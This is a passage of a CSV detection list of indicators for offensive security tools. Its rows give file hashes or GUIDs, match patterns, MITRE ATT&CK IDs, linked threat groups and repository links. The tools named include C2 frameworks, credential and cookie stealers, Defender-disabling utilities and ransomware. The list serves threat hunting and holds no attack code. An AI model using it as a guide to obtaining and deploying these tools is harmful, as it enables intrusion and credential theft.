"*cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce*",".{0,1000}cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37634" 
"*cb0b0fa30345d487f99dce16cb07ef0094938dbf7eedfe48e2a0ad7f2973a7bb*",".{0,1000}cb0b0fa30345d487f99dce16cb07ef0094938dbf7eedfe48e2a0ad7f2973a7bb.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#filehash","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","37635" "*cb0bacc6cda2b791aca69d7ac01f3e43ab2d747e037b1ca0d5779b58b5a72798*",".{0,1000}cb0bacc6cda2b791aca69d7ac01f3e43ab2d747e037b1ca0d5779b58b5a72798.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37636" "*cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e*",".{0,1000}cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37637" "*cb10930997bcc3b5667fea0bf825208cfd87f96f6990082e81cd31123a8b01b7*",".{0,1000}cb10930997bcc3b5667fea0bf825208cfd87f96f6990082e81cd31123a8b01b7.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - 
T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","37638" "*cb10b5bb6fd0d22f1388cd1864af49f224b7caec1cb56145b225b6035da73428*",".{0,1000}cb10b5bb6fd0d22f1388cd1864af49f224b7caec1cb56145b225b6035da73428.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37639" "*cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4*",".{0,1000}cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37640" "*cb1995529b5d234699ede8dd41de77848b2ab6ffb43e3c150aba987f44a38779*",".{0,1000}cb1995529b5d234699ede8dd41de77848b2ab6ffb43e3c150aba987f44a38779.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - 
TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37642" "*cb1c1dec2980acb674da9b9cb077fda38cfc035a600f65c6fdc84cb8636eddb0*",".{0,1000}cb1c1dec2980acb674da9b9cb077fda38cfc035a600f65c6fdc84cb8636eddb0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37643" "*cb21ae1cd69be5a97dd4b3e67779100a58f86761ecd83624e5645945a8df0c59*",".{0,1000}cb21ae1cd69be5a97dd4b3e67779100a58f86761ecd83624e5645945a8df0c59.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","37644" "*cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde*",".{0,1000}cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37645" 
"*cb287d756b38831a47d5cd86e5b332be4997d89fa275de5a99883ec151b4bbdc*",".{0,1000}cb287d756b38831a47d5cd86e5b332be4997d89fa275de5a99883ec151b4bbdc.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","37646" "*cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d*",".{0,1000}cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","#filehash","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","37647" "*cb2ca98c55b3128b2ba07b17243f67fb68ccba99a6d4476480cdf80741b2eda0*",".{0,1000}cb2ca98c55b3128b2ba07b17243f67fb68ccba99a6d4476480cdf80741b2eda0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37648" "*cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf*",".{0,1000}cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37651" "*cb3d6fffb558efda2aca145d63aac6e1501dee7be14f8d2e9a3d3f3c369fc6e2*",".{0,1000}cb3d6fffb558efda2aca145d63aac6e1501dee7be14f8d2e9a3d3f3c369fc6e2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37652" "*cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9*",".{0,1000}cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37653" "*cb4406bc759bd471ac86d80678abd6dcec4934d8db7d92123ebd5960330699cf*",".{0,1000}cb4406bc759bd471ac86d80678abd6dcec4934d8db7d92123ebd5960330699cf.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#filehash","N/A","10","","N/A","","","","37654" "*cb4490df575c59cc338804d8401be9782981fa7a5e9785a03781a3c135a8d837*",".{0,1000}cb4490df575c59cc338804d8401be9782981fa7a5e9785a03781a3c135a8d837.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37655" "*cb4591d160b6943c4af0374fa661a3f754682cc92c92f5b2382ac006ad8dad3b*",".{0,1000}cb4591d160b6943c4af0374fa661a3f754682cc92c92f5b2382ac006ad8dad3b.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37656" "*cb492d017e08e8eaed726559fe3ce8b499ec838392b9e669c6d781b50ee8e7a9*",".{0,1000}cb492d017e08e8eaed726559fe3ce8b499ec838392b9e669c6d781b50ee8e7a9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37657" "*cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a*",".{0,1000}cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37658" "*cb4af671a007c51441f62673948dda869f7e746f791e2ff776de9a17ff900e65*",".{0,1000}cb4af671a007c51441f62673948dda869f7e746f791e2ff776de9a17ff900e65.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37659" "*CB561720-0175-49D9-A114-FE3489C53661*",".{0,1000}CB561720\-0175\-49D9\-A114\-FE3489C53661.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#GUIDproject","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","37662" "*cb5a07900a7a01a7619e3391c0a2b59f81a8d8784c66698bb02263faef9311a1*",".{0,1000}cb5a07900a7a01a7619e3391c0a2b59f81a8d8784c66698bb02263faef9311a1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37664" "*cb5f87dbd2f764382e033f11807f823c72532878966ad60b479e523a3aef30cd*",".{0,1000}cb5f87dbd2f764382e033f11807f823c72532878966ad60b479e523a3aef30cd.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37667" "*cb6759a0fccc69211687c11da0831532c127e7657eb74bc9ee3c86ad08097935*",".{0,1000}cb6759a0fccc69211687c11da0831532c127e7657eb74bc9ee3c86ad08097935.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37668" "*cb67da2517b03494285a38806be0aefd25443a3c098227f23023b48d4fa575da*",".{0,1000}cb67da2517b03494285a38806be0aefd25443a3c098227f23023b48d4fa575da.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37669" 
"*cb7521ed61b825e46af63d8e3d82ba30540be70145b1a24e2cdec82be9256922*",".{0,1000}cb7521ed61b825e46af63d8e3d82ba30540be70145b1a24e2cdec82be9256922.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37671" "*cb7615b1cee96548eeaaa7a8319f6a64310052e7f6bdc54529dd7f4b8c0c2845*",".{0,1000}cb7615b1cee96548eeaaa7a8319f6a64310052e7f6bdc54529dd7f4b8c0c2845.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37672" "*CB790E12-603E-4C7C-9DC1-14A50819AF8C*",".{0,1000}CB790E12\-603E\-4C7C\-9DC1\-14A50819AF8C.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","37673" "*cb825b66b73ae775bd034e0ff8506e2008e54c57862155446aba6552dd484017*",".{0,1000}cb825b66b73ae775bd034e0ff8506e2008e54c57862155446aba6552dd484017.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37675" 
"*cb8f501c3b38552612b6303dfec0479df31b9c79a5fbec5462614f9a1d7eba67*",".{0,1000}cb8f501c3b38552612b6303dfec0479df31b9c79a5fbec5462614f9a1d7eba67.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37676" "*cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b*",".{0,1000}cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37678" "*cb9447135d98011ed452d9b69d6b88f732ce08e2481b1c2f78b4bdd36d090bb2*",".{0,1000}cb9447135d98011ed452d9b69d6b88f732ce08e2481b1c2f78b4bdd36d090bb2.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37679" "*cba64638575e382bab065f43dc60b76943bce77854a80af38debeb803edb96e4*",".{0,1000}cba64638575e382bab065f43dc60b76943bce77854a80af38debeb803edb96e4.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - 
TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37682" "*cba7954a3a44198ede1f02ab8b4ce571d089b72b1dab61bd5cf004958a5e1172*",".{0,1000}cba7954a3a44198ede1f02ab8b4ce571d089b72b1dab61bd5cf004958a5e1172.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","#filehash","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","37684" "*cba965f520de118009142c8dc4076be542d53e4985fe55f69acf8651a3a4067a*",".{0,1000}cba965f520de118009142c8dc4076be542d53e4985fe55f69acf8651a3a4067a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37685" "*CBAB0FE9-F4C0-49F2-90B1-7F34593F705A*",".{0,1000}CBAB0FE9\-F4C0\-49F2\-90B1\-7F34593F705A.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","37686" 
"*cbaea921d56ea8c24330964c8b73ba77ceccd1691b80213399c18eb82c54b11a*",".{0,1000}cbaea921d56ea8c24330964c8b73ba77ceccd1691b80213399c18eb82c54b11a.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37688" "*cbaf0210687d757f1633501c2706a4c7e58ce7eace047c9baeb720abc83e9528*",".{0,1000}cbaf0210687d757f1633501c2706a4c7e58ce7eace047c9baeb720abc83e9528.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37689" "*cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b*",".{0,1000}cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#filehash","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","37691" "*cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07*",".{0,1000}cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37692" "*cbc3576e68c1b71336ccdbd3872474fd7dff23932ae2dd4f310bf22551187281*",".{0,1000}cbc3576e68c1b71336ccdbd3872474fd7dff23932ae2dd4f310bf22551187281.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37693" "*cbc4d8625c86cc011647a533bc6f8667bf16547ae42cf7e01a48259ca507ac8f*",".{0,1000}cbc4d8625c86cc011647a533bc6f8667bf16547ae42cf7e01a48259ca507ac8f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37694" "*cbe090ee5a7210e39968ed958acbecdf0251eceb8e7b0f4acec6efb21e63025f*",".{0,1000}cbe090ee5a7210e39968ed958acbecdf0251eceb8e7b0f4acec6efb21e63025f.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","37696" "*cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71*",".{0,1000}cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","#filehash","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","37697" "*cbec6150e83403631fe741f0c50e516170279645c246638b0148e1b87c0848e7*",".{0,1000}cbec6150e83403631fe741f0c50e516170279645c246638b0148e1b87c0848e7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37698" "*cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","37699" "*cbef865bf615c4848daf375557669dcadbd531b38f9335b11b411b3621b8a6dc*",".{0,1000}cbef865bf615c4848daf375557669dcadbd531b38f9335b11b411b3621b8a6dc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
